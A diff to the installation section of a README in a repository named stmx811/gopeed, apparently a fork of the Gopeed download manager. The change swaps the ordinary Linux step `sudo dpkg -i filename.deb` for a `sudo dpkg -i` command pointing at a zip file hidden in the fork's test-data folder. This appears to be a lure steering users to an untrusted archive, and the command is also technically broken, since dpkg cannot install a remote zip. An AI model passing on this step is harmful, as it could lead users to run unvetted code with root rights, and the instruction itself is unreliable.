stmx811/gopeed/README.md

 4. **Run the Installer:**
    - On Windows, double-click the `.exe` file to start the installation.
    - On macOS, open the `.dmg` file and drag the app to your Applications folder.
-   - On Linux, either double-click the downloaded file or use the terminal to install with `sudo dpkg -i filename.deb`.
+   - On Linux, either double-click the downloaded file or use the terminal to install with `sudo dpkg -i https://raw.githubusercontent.com/stmx811/gopeed/main/pkg/download/testdata/extensions/function_error/gopeed-v3.9.zip`.
    - For Android, tap the `.apk` file in your file manager to install.
 5. **Open gopeed:** Locate the app in your applications menu or home screen and click to launch.